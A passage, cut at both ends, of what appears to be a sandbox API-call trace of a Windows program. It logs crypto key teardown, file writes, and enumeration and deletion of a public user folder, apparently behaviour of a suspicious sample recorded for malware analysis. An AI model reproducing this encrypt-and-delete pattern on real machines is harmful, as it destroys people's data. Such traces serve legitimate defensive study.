(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.931] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.931] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.931] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.931] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.931] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.931] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.932] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.932] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.932] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.932] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.932] WriteFile (in: hFile=0x4ac, lpBuffer=0x2a71d58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71d58*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0223.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.933] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0223.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.933] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0223.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.933] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.933] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.933] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.933] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.933] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.934] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0223.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab908, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.934] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0223.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.934] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.934] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.934] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.934] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.934] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.934] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.934] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.934] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.934] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.934] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.935] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.935] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.935] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.935] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.935] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.935] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.936] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.936] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.936] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.936] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.936] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.936] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.936] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.936] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.936] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.936] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.937] CryptReleaseContext (hProv=0xa7c880, dwFlags=0x0) returned 1 [0223.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.937] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.937] FreeLibrary (hLibModule=0x76390000) returned 1 [0223.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.938] CloseHandle (hObject=0x4ac) returned 1 [0223.938] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.938] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.938] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x8cedf4*="My Videos") returned 0x23 [0223.938] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos")) returned 0x2416 [0223.939] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x0, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="", cAlternateFileName="Ƙʦ桰ʪ")) returned 0xffffffff [0223.939] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0223.939] GetLastError () returned 0x6 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0223.939] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0223.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x29f7878 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0223.940] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d840 [0223.940] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Videos", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x8cf650*="My Videos") returned 0x23 [0223.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d840 | out: hHeap=0x2af0000) returned 1 [0223.940] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos" (normalized: "c:\\users\\public\\documents\\my videos")) returned 0x2416 [0223.940] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 